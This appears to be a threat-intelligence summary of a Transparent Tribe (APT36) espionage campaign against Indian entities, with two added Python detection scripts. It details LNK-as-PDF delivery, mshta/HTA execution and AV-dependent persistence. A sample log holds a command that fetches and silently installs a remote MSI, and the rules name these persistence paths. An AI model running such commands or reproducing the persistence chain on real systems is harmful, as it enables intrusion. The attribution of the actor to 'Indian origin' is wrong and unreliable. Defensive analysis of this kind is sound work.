Full Report
The threat actor known as Transparent Tribe has been attributed to a fresh set of attacks targeting Indian governmental, academic, and strategic entities with a remote access trojan (RAT) that grants them persistent control over compromised hosts. "The campaign employs deceptive delivery techniques, including a weaponized Windows shortcut (LNK) file masquerading as a legitimate PDF document
Analysis Summary
# Threat Actor: Transparent Tribe
## Attribution & Identity
* **Identification:** Threat actor known as Transparent Tribe (also referred to as APT36).
* **Attribution:** Assessed to be a state-sponsored adversary of Indian origin.
* **Known Aliases:** APT36.
* **Historical Activity:** Active since at least 2013, known for mounting cyber espionage campaigns.
## Activity Summary
Transparent Tribe has launched a fresh set of cyber espionage attacks targeting Indian governmental, academic, and strategic entities. The primary goal of these attacks is to gain persistent control over compromised hosts via a Remote Access Trojan (RAT). Recent activity includes exploiting social engineering with deceptive delivery techniques and separately using a .NET-based loader dropped via a shortcut file disguised as a government advisory PDF.
## Tactics, Techniques & Procedures
* **Initial Access/Delivery:** Spear-phishing emails carrying a ZIP archive that holds a weaponized Windows shortcut (.LNK) file masquerading as a legitimate PDF document (with embedded PDF content to avoid suspicion).
* **Execution:**
  * The LNK file triggers execution of a remote HTML Application (.HTA) script via `mshta.exe`.
  * The HTA script uses ActiveX objects, specifically `WScript.Shell`, for environment profiling and runtime manipulation.
  * In a secondary campaign example, a shortcut runs an obfuscated command via `cmd.exe` to retrieve an MSI installer from a remote server.
* **Payload Deployment:** The HTA payload decrypts and loads the final RAT payload directly into memory. A decoy PDF is opened in tandem to reduce user suspicion.
* **Persistence:** The persistence mechanism is selected according to the antivirus (AV) product detected on the host:
  * **If Kaspersky is detected:** Creates a directory under `C:\Users\Public\core\`, drops an obfuscated HTA payload to disk, and establishes persistence via an LNK file in the Windows Startup folder.
  * **If Quick Heal is detected:** Creates a batch file and a malicious LNK file in the Windows Startup folder, writes the HTA payload to disk, and invokes it from the batch script.
  * **If Avast, AVG, or Avira is detected:** Copies the payload directly into the Startup folder and executes it.
  * **If no recognized AV is detected:** Falls back to a combination of batch-file execution, registry-based persistence, and payload deployment.
* **Capabilities (RAT):** A fully featured RAT, implemented as `iinneldc.dll`, supports remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control.
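The delivery technique described under Initial Access/Delivery (a ZIP archive carrying an LNK named to look like a PDF) can be checked mechanically at a mail gateway or sandbox intake. The following Python is an added example, not code from the report or from any vendor analysis. It builds a constructed sample archive in memory, then flags members by extension, by double extension, by whitespace padding in the name, and by the Shell Link header bytes, so a shortcut renamed to `.pdf` is still caught. File names, the `Advisory/` folder and the padded name are constructed placeholders.

```python
"""Flag Windows shortcuts (.lnk) posing as PDFs inside a ZIP attachment.

Added example (not from the original report). The sample archive is
constructed in memory so the script runs offline.
"""
from __future__ import annotations

import io
import zipfile

# Shell Link header: HeaderSize 0x0000004C followed by the LinkCLSID
# 00021401-0000-0000-C000-000000000046 in little-endian GUID byte order.
LNK_MAGIC = bytes.fromhex("4C000000" "0114020000000000C000000000000046")
PDF_MAGIC = b"%PDF-"
SUSPECT_EXTENSIONS = (".lnk", ".hta", ".bat", ".cmd", ".js", ".vbs", ".scr")

# Constructed file name with 16 spaces of padding before the extension.
PADDED_NAME = "Advisory/Report" + " " * 16 + ".pdf"


def is_lnk(data: bytes) -> bool:
    """True if the bytes start with a Shell Link header, whatever the name says."""
    return data[:20] == LNK_MAGIC


def classify_member(name: str, data: bytes) -> list[str]:
    """Return the reasons a ZIP member looks like a disguised shortcut or script."""
    reasons: list[str] = []
    base = name.rsplit("/", 1)[-1].lower()          # ZIP entries use '/' separators
    ext = "." + base.rsplit(".", 1)[-1] if "." in base else ""
    if ext in SUSPECT_EXTENSIONS:
        reasons.append(f"executable shortcut/script extension {ext}")
    if ".pdf." in base:
        reasons.append("double extension with .pdf in the middle")
    if is_lnk(data):
        reasons.append("Shell Link header present (file is an LNK regardless of name)")
        if ext != ".lnk":
            reasons.append("LNK content stored under a non-.lnk name")
    if ext == ".pdf" and not data.startswith(PDF_MAGIC):
        reasons.append(".pdf name but no %PDF- header")
    if "   " in base:
        reasons.append("whitespace padding in file name (hides the real extension)")
    return reasons


def scan_zip(blob: bytes) -> dict[str, list[str]]:
    """Map each suspicious member name to its list of reasons."""
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = classify_member(info.filename, zf.read(info.filename))
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: a decoy PDF, a readme, and two shortcut stubs."""
    # Header-sized stub only; this is not a functioning shortcut.
    lnk_stub = LNK_MAGIC + b"\x00" * 44
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Advisory/Cyber_Advisory_2024.pdf.lnk", lnk_stub)
        zf.writestr("Advisory/Decoy.pdf", b"%PDF-1.4\n%decoy\n")
        zf.writestr("Advisory/Readme.txt", b"please review the attached advisory\n")
        zf.writestr(PADDED_NAME, lnk_stub)
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip(build_sample_zip()).items():
        print(member)
        for r in reasons:
            print("  -", r)
```

The header check matters more than the extension check: a gateway that only blocks `*.lnk` is bypassed by renaming, while the 20-byte Shell Link prefix is fixed by the file format.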
## Targeting
* **Sectors:** Governmental entities, academic institutions, and strategic entities.
* **Geography:** India.
* **Victims:** Indian government, Indian academia.
## Tools & Infrastructure
* **Malware Families Used:** Remote Access Trojans (RATs).
* **Known RATs used historically/recently:** CapraRAT, Crimson RAT, ElizaRAT, DeskRAT.
* **Latest Payload:** A DLL named `iinneldc.dll` functioning as the main RAT.
* **Other Components:** .NET-based loader, malicious DLLs (`pdf.dll`, `wininet.dll`), `PcDirvs.exe`.
* **Infrastructure (Defanged):**
* Remote server retrieving components: `aeroclubofindia[.]co[.]in` (used in the shortcut campaign example).
## Implications
Transparent Tribe remains a highly persistent and strategically driven cyber-espionage threat. Their sustained focus on intelligence collection targets high-value Indian government and educational sectors, utilizing sophisticated anti-AV evasion techniques and adaptive persistence methods to ensure long-term access.
## Mitigations
* (Not explicitly mentioned in the article, but inferred from the TTPs:)
  * Implement stringent email filtering to block malicious LNK/ZIP attachments.
  * Educate users on social engineering tactics involving fake file extensions (e.g., shortcuts masquerading as PDFs).
  * Monitor for unusual execution patterns involving `mshta.exe`, and for suspicious activity in the Windows Startup folder or public user directories.
  * Deploy endpoint detection and response (EDR) tuned to detect memory-only payloads, to counter fileless execution techniques.
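The Execution and Persistence items under Tactics, Techniques & Procedures, and the monitoring mitigations listed above, reduce to a handful of host-telemetry rules: `mshta.exe` launching an HTA, `cmd.exe` pulling an MSI from a remote URL, writes under `C:\Users\Public\core\` or into the Startup folder, and Run-key values that invoke HTA or batch content. The following Python is an added example, not code from the report. The JSON log lines are constructed (the user name, paths and the `example.invalid` URL are placeholders), and the rule labels are my own names, not MITRE identifiers.

```python
"""Run simple Transparent Tribe style rules over constructed endpoint events.

Added example (not from the original report). Events are JSON lines with
a "type" of process, file or registry, roughly modelled on Sysmon fields.
"""
from __future__ import annotations

import json
import re

# Constructed sample telemetry; paths, user and URL are placeholders.
SAMPLE_LOG = r'''
{"type": "process", "image": "C:\\Windows\\System32\\mshta.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "mshta.exe C:\\Users\\alice\\AppData\\Local\\Temp\\advisory.hta"}
{"type": "process", "image": "C:\\Windows\\System32\\cmd.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "cmd.exe /c msiexec /i https://example.invalid/update.msi /qn"}
{"type": "file", "image": "C:\\Windows\\System32\\mshta.exe", "path": "C:\\Users\\Public\\core\\svc.hta"}
{"type": "file", "image": "C:\\Windows\\System32\\mshta.exe", "path": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.lnk"}
{"type": "registry", "image": "C:\\Windows\\System32\\cmd.exe", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svc", "value": "mshta.exe C:\\Users\\Public\\core\\svc.hta"}
{"type": "process", "image": "C:\\Program Files\\Adobe\\Acrobat\\Acrobat.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "Acrobat.exe C:\\Users\\alice\\Downloads\\advisory.pdf"}
{"type": "file", "image": "C:\\Windows\\System32\\msiexec.exe", "path": "C:\\Program Files\\Vendor\\app.exe"}
'''

HTA_ARG_RE = re.compile(r"\.hta\b", re.I)
REMOTE_MSI_RE = re.compile(r"msiexec.*https?://", re.I)
PUBLIC_CORE_RE = re.compile(r"^C:\\Users\\Public\\core\\", re.I)
STARTUP_RE = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(lnk|bat|cmd|hta)$", re.I)
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
SCRIPT_VALUE_RE = re.compile(r"mshta|\.hta\b|\.bat\b", re.I)


def detect(event: dict) -> list[str]:
    """Return the rule labels (constructed names) that one event matches."""
    hits: list[str] = []
    kind = event.get("type")
    image = event.get("image", "").lower()
    if kind == "process":
        cmd = event.get("cmdline", "")
        parent = event.get("parent", "").lower()
        if image.endswith("\\mshta.exe") and HTA_ARG_RE.search(cmd):
            note = ""
            if parent.endswith("\\explorer.exe"):
                note = " from explorer.exe (consistent with a double-clicked shortcut)"
            hits.append("EXEC_MSHTA_HTA: mshta.exe launching an HTA script" + note)
        if image.endswith("\\cmd.exe") and REMOTE_MSI_RE.search(cmd):
            hits.append("EXEC_REMOTE_MSI: cmd.exe retrieving an MSI installer from a remote URL")
    elif kind == "file":
        path = event.get("path", "")
        if PUBLIC_CORE_RE.search(path):
            hits.append("PERSIST_PUBLIC_CORE: file written under C:\\Users\\Public\\core\\")
        if STARTUP_RE.search(path) and SCRIPT_EXT_RE.search(path):
            hits.append("PERSIST_STARTUP: shortcut or script dropped in the Startup folder")
    elif kind == "registry":
        if RUN_KEY_RE.search(event.get("key", "")) and SCRIPT_VALUE_RE.search(event.get("value", "")):
            hits.append("PERSIST_RUNKEY: Run key value invoking mshta, an HTA or a batch file")
    return hits


def scan(log_text: str) -> dict[int, list[str]]:
    """Map 1-based line numbers of matching events to their rule hits."""
    findings: dict[int, list[str]] = {}
    for lineno, line in enumerate(log_text.strip().splitlines(), 1):
        if not line.strip():
            continue
        hits = detect(json.loads(line))
        if hits:
            findings[lineno] = hits
    return findings


def rules_seen(findings: dict[int, list[str]]) -> list[str]:
    """Sorted unique rule labels across all findings, for a quick triage summary."""
    return sorted({hit.split(":", 1)[0] for hits in findings.values() for hit in hits})


if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for lineno, hits in result.items():
        for h in hits:
            print(f"line {lineno}: {h}")
    print("rules seen:", ", ".join(rules_seen(result)))
```

Each rule on its own is noisy in some environments (legitimate HTAs exist, and installers do fetch MSIs), so the practical signal is the combination: an `mshta.exe` execution followed within minutes by the same process writing into the Startup folder or under `C:\Users\Public\core\`, which is exactly the chain the Persistence section describes.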